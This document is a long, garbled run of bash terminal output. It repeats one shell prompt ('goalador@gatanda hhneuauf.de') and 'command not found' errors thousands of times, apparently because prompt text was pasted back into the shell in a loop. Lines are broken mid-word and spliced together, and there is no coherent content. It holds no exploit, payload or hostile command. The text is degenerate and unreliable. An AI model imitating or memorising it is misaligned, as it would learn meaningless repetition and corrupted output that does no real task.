+[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalad[goalador@gatanda hhneuauf.de]$ [goalador@gatanda h>[goalador@gatanda hhneuauf.de]$ bash: hhneuauf.de]$: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalad[goalador@gatanda: command not foundbash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ gatanda hhneuauf.de]$ +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ gatanda hhneuauf.de]$ +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ hhneuauf.de]$ +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: hhneuauf.de]$: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalad[goalador@gatanda hhneuauf.de]$ [goalador@gatanda h>[goalador@gatanda hhneuauf.de]$ bash: hhneuauf.de]$: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalad[goalador@gatanda: command not foundgatanda hhneuauf.de]$ +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +f.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: comhhneuauf.de]$goalador@gatanda: command not found +[goaladorgoalador@gatanda: command not found +[goaladorgoalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: hhneuauf.de]$: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ f.de]$ bash: [goalador@gatanda: command not found +bash: f.de]$: command not found +[goalador@gatandabash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: hhneuauf.de]$: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ f.de]$ bash: [goalador@gatanda: command not found +bash: f.de]$: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash:bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: hhneuauf.de]$: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ f.de]$ bash: [goalador@gatanda: command not found +bash: f.de]$: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: comhhneuauf.de]$goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goaladorgoalador@gatanda: command not found +bash: [goaladorgoalador@gatanda:: command not found +[goalador@gatanda hhneuauf.de]$ [goaladorgoalador@gatanda: command not found +bash: [goaladorgoalador@gatanda:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: hhneuauf.de]$: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ f.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: f.de]$: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatandabash: [goalador@gatanda: command not found +not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: hhneuauf.de]$: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ f.de]$ bash: [goalador@gatanda: command not found +bash: f.de]$: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash:bash: [goalador@gatandabash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +babash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: hhneuauf.de]$: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ f.de]$ bash: [goalador@gatanda: command not found +bash: f.de]$: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: comhhneuauf.de]$goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goaladorgoalador@gatanda: command not found +bash: [goaladorgoalador@gatanda:: command not found +[goalador@gatanda hhneuauf.de]$ [goaladorgoalador@gatanda: command not found +bash: [goaladorgoalador@gatanda:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: hhneuauf.de]$: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ f.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: f.de]$: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatandabash: [goalador@gatanda: command not found +not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: hhneuauf.de]$: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ f.de]$ bash: [goalador@gatanda: command not found +bash: f.de]$: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash:bash: [goalador@gatandabash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: hhneuauf.de]$: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ f.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: f.de]$: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash:bash: [goalador@gatanda: command not found +bash: bash:bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +obash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +]$ [goalador@gatanda hbash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda 